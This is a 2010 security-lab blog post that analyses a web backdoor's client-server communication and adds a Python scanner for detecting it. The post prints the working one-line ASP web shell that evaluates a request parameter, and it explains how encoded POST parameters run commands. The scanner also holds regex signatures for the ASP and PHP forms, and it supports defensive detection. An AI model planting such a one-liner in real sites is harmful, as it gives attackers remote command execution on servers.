June 30, 2010

Analysis of a backdoor's communication process

Lei Li

Websense Security Labs™ ThreatSeeker™ Network has detected a backdoor written by a Chinese hacker spreading in the wild. In this post we explore what an attacker can do with such a backdoor.

The controller client of the backdoor can explore and modify all files on a compromised server:


Also, hackers can use a client to run commands on the compromised server:

Because the client side does most of the work, the server side needs only a few lines of ASP or PHP, so it can easily be injected into a web page through SQL injection or another attack technique. The server-side source code looks like this:

<%eval request("hack")%>

By capturing the network packets, we can see what the backdoor did. Here is an example:


The client sends an encoded command string to the server as a POST request. The string is:


After decoding it, we can see how a command is run on the compromised server:

The parameter z1 is "cmd", which opens a command line on the server side, and the parameter z2 is:

In response, the server returns a listing of all files in the current folder:

The above shows a "dir" command being run on the compromised server. Using this method, an attacker can run almost any command on the server from the client side.
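Because the server-side component is just the one-liner shown above, the most direct defensive check is to look for that eval-of-request idiom in files under a web root. The following scanner is an added example written for this post, not code from Websense or from the backdoor; it matches the ASP one-liner quoted above and, as a generalization, the equivalent PHP idiom (eval of a request parameter), and the file-extension list is an assumption.

```python
import re
from pathlib import Path

# Signatures for the one-line "eval the request parameter" backdoor.
# The ASP form is the one quoted in the post; the PHP form is the equivalent
# idiom, added here as a generalization rather than taken from the post.
WEBSHELL_PATTERNS = [
    ("asp-eval-request",
     re.compile(r"<%\s*eval\s*\(?\s*request\s*\(\s*[\"'][^\"']+[\"']\s*\)\s*\)?\s*%>", re.I)),
    ("asp-execute-request",
     re.compile(r"<%\s*execute\s*\(?\s*request\s*\(", re.I)),
    ("php-eval-request",
     re.compile(r"eval\s*\(\s*\$_(?:POST|GET|REQUEST)\s*\[", re.I)),
]


def scan_text(text):
    """Return a list of (signature name, matched fragment) pairs found in one file's content."""
    hits = []
    for name, pattern in WEBSHELL_PATTERNS:
        for m in pattern.finditer(text):
            hits.append((name, m.group(0)))
    return hits


def scan_webroot(root, extensions=(".asp", ".aspx", ".asa", ".php", ".phtml")):
    """Walk a web root and return {path: hits} for every file that contains a signature.
    The extension list is an assumption; adjust it to what the server actually executes."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file() or path.suffix.lower() not in extensions:
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        hits = scan_text(text)
        if hits:
            findings[str(path)] = hits
    return findings


# Constructed samples: the one-liner from the post appended to an otherwise
# harmless page (as it would look after injection), and a clean page.
SAMPLE_INJECTED_PAGE = '<html><body>Welcome</body></html>\n<%eval request("hack")%>\n'
SAMPLE_CLEAN_PAGE = '<html><body><% Response.Write("hello") %></body></html>\n'

if __name__ == "__main__":
    for label, sample in (("injected", SAMPLE_INJECTED_PAGE), ("clean", SAMPLE_CLEAN_PAGE)):
        print(label, scan_text(sample))
```

Run scan_webroot() against a copy of the document root (or the live one, read-only) and review every hit by hand; a match is a strong indicator but the surrounding file should still be inspected.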


Websense Messaging and Websense Web Security customers are protected against these attacks.
